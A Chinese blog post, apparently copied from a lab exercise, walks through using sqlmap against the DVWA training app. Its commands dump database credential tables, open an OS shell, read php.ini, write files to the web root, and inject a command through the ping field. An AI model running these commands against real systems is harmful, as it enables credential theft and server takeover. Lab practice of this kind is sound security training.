Sqlmap

已于 2024-01-04 15:40:38 修改
阅读量38 收藏
点赞数
文章标签: 网络
于 2024-01-03 15:19:35 首次发布
原文链接:https://www.hetianlab.com/expc.do?ec=ECIDd25f-e8f3-4ee2-8986-9f464fb9089f
版权
本文详细介绍了如何使用sqlmap这款工具进行POST注入、交互式写shell、手工注入以及文件读写操作,包括攻击流程和具体命令,展示了如何通过SQL注入漏洞获取敏感信息和控制服务器。
摘要由CSDN通过智能技术生成

sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。

利用sqlmap进行POST注入

1.POST注入形成的原因

POST注入也属于SQL注入,所以究其原因还是由于参数没有过滤导致的。

2.流程

选择Brute Force选项,username和password随便输入,然后打开burpsuite,进行抓包。将抓到的包保存为1.txt,并放到c盘根目录下。

  1. 列数据库,输入命令:sqlmap.py -r c:\1.txt -p username --dbs(--current-db)
  2. 猜表,输入命令:sqlmap.py -r c:\1.txt-p username -D mysql --tables
  3. 猜列,输入命令:sqlmap.py -r c:\1.txt-p username -D mysql -T user --columns
  4. 猜数据,输入命令:sqlmap.py -r c:\1.txt -p username -D mysql -T user -C “User,Password” ----dump
    -r:加载一个文件     -p:指定参数

利用sqlmap交互式写shell

1.流程
  1. 选择Command Execution,并输入:10.1.1.136 & pwd。获得一个绝对路径,/opt/lampp/htdocs/vulnerabilities/exec,存入1.txt。

  2. 选择SQL Injection,随意输入一个数,使用burpsuite进行抓包,获取cookie,存入1.txt。将包放出去(forword),停止监听。

  3. 将网址(DVWA-SQL Injection)复制到1.txt中。

  4. 判断用户是否为dba,输入命令:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --is-dba
    -u:注入点

  5. 接下来使用sqlmap进行交互式写shell,输入命令:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --os-shell
    脚本类型为PHP,所以输入4。
    选择2,输入第一步得到的绝对路径。

利用sqlmap辅助手工注入

1.流程
  1. 找到并打开SQL Injection,随便提交一个数,打开burpsuite抓包,然后点击submit,获取cookie

  2. 使用内置函数获取用户名,版本,数据库名等信息,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --sql-query "select user(),version(),database()"

  3. 得到数据库名为dvwa,接下来猜表,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --sql-query "(select count(*) from dvwa.users)>0"
    返回1则存在user表

  4. 开始猜列,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --sql-query "(select count(username) from dvwa.users)>=0"
    没有返回,说明不存在username列,将username改为user,返回1。
    --sql-query "(select count(password) from dvwa.users)>=0"

  5. 猜内容,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit"
    --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --sql-query "select user,password from dvwa.users"

  6. 借助sqlmap选项--sql-query结合手工注入语句就得到了user表中的用户信息

利用sqlmap进行文件读写

1.流程
  1. 选择Command Execution,并输入:10.1.1.136 & pwd。获得一个绝对路径,/opt/lampp/htdocs/vulnerabilities/exec,存入1.txt。

  2. 选择SQL Injection,随意输入一个数,使用burpsuite进行抓包,获取cookie,存入1.txt。将包放出去(forword),停止监听。

  3. 将网址(DVWA-SQL Injection)复制到1.txt中。

  4. 读取服务器端文件,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit"
    --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --file-read=/opt/lampp/htdocs/php.ini
    成功读取了php.ini文件,并返回了路径。

  5. 在服务器端写入文件,输入:
    sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low"
    --file-write C:\1.txt
    --file-dest /opt/lampp/htdocs/vulnerabilities/exec    /1.txt

    说明:将本地C:\1.txt 写入到服务器端/opt/lampp/htdocs/vulnerabilities/exec/1.txt

魔鬼波波鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLmap
m0_65332604的博客
04-06 2126
SQLmap
SQLMAP
xiaomengxin70的博客
05-28 1753
SQLmap简介: sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB sqlmap五种不同的注入模式:
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
SQLMap
WX公众号-小白学安全
10-26 3703
概述 ​ SQLMap是一款开源、自动化的SQL注入漏洞检测工具,主要功能是扫描、发现并利用给定URL的SQL注入漏洞,能够检测动态页面中的get/post参数、cookie、http头、还可以查看数据、文件系统访问、甚至能够操作系统命令执行。 支持的数据库:MySQL、Oracle、PostgreSQL、MSSQL、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDb 检测方式:union联合查询注入、布尔盲注、时间盲注、报错注入、堆叠注入 基
sqlmap
weixin_62420492的博客
12-19 497
sqlmap
ubuntu install sqlmap
琳琳的博客
12-11 810
中间还有很多参数的解释。1.安装sqlmap
[工具使用]SqlMap
热门推荐
网络安全知识分享
08-29 5万+
[工具使用]SqlMapSqlMap常用指令探测目标网站是否存在注入 本文采用实例:sqli-labs靶场Less-1 SqlMap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔
sqlmap使用
zhoufy的博客
08-19 273
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”] -D [‘数据库名’] --tables #列出表名 : sqlmap -u [“url”] -D...
sqlmap目录及结构
weixin_50464560的博客
08-02 1573
sqlmap目录及结构 Tips:此篇文章主要参考了《sqlmap从入门到精通》这本书中的相关具体细节,由于这本书作者完成的时间大概在2017年作用,所以我根据书中提到的信息再根据目前最新版的sqlmap目录结构进行了优化。 sqlmap文件目录及主文件 1.sqlmap目录结构 2.sqlmap主文件解读 (1) .gitattributes git的属性文件,例如:是什么编程语言,具体的文件类型等等 (2) .gitignore git需要忽略的文件,一般按照理解,把一些没有必要传上去的文件排除在外,
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据库的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap安装包
01-19
**SQLMap介绍** SQLMap是一款开源的自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它能够帮助安全研究人员或渗透测试人员快速、准确地发现和利用目标系统中的SQL注入漏洞,从而提高测试效率。SQLMap的强大...
SqlMap的使用
06-24
### SqlMap的使用详解 #### 一、SqlMap简介及工作原理 SqlMap是一款开源的渗透测试工具,用于自动化地检测并利用Web应用程序中的SQL注入漏洞。它支持多种类型的数据库,如MySQL、Oracle、PostgreSQL等,并能进行...
【qt】基于tcp的消息发送
yyqzjw的博客
08-18 322
我们需要实现客户端发消息,服务端接收消息。
Linux网络设置
Lwc1027的博客
08-18 1219
根据pid查询5、查看端口查看网络配置的几个命令又ifconfig、hostname、route、netstat、ss,可以查看网卡,路由表还有统计信息,可以直接指定查询需要的指令。
RegFormer:用于大规模点云配准的高效投影感知Transformer网络
人工智能小白
08-18 756
2023年ICCV论文RegFormer的论文解读,点云配准工作背景,网络结构,实验分析
day 28 HTTP协议
2301_79909332的博客
08-17 399
UDP MTU最大传输单元(理论:65535 实际:1500)TCP发送数据是连续的,两次发送的数据可能粘连成一包被接收到。例如:https://www.baidu.com。3.客户端向发送HTTP请求报文,告诉服务器想要的数据。4.服务器回复HTTP响应报文,将客户端要的数据发回。长连接:通信前建立链接,通过新过程中链接一直保持。1、HTTP:超文本传输协议,在协议的应用层。1.协议://主机:端口号/资源路径。UDP是无连接的,面向数据包的传输方式。TCP是面向连接的,面向字节流传输方式。
网络编程】第十章 网络层-IP(分片组装+网段+路由+NAT)
最新发布
YQ20210216的博客
08-22 682
将目的ip和路由表中子网掩码"按位与"之后得到网络地址,再和Destination比较,两者相等代表当前ip就是需要通过该项路由,此时通过Iface接口发出去,如果和Destination不相等,则继续与下一个子网掩码比较,以此类推,最后由default 默认路由发送出去。传输层一次向下交付的数据太多了会导致分片,数据链路层不支持过大的数据,这就需要在发送方网络层对数据进行分片,分片后的每片都有独立ip,分片会提高丢包的概率,影响传输速率。局域网中主机的私有IP 和 外网当中的某个公网IP之间的映射关系。
Sqlmap自定义检测参数详解
"Sqlmap是一款自动化SQL注入工具,用于检测和利用SQL注入漏洞。本视频课程专注于讲解Sqlmap的自定义检测参数,包括设置探测等级、风险参数、页面比较参数和内容比较参数,以实现更精确和灵活的扫描。" 在SQL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值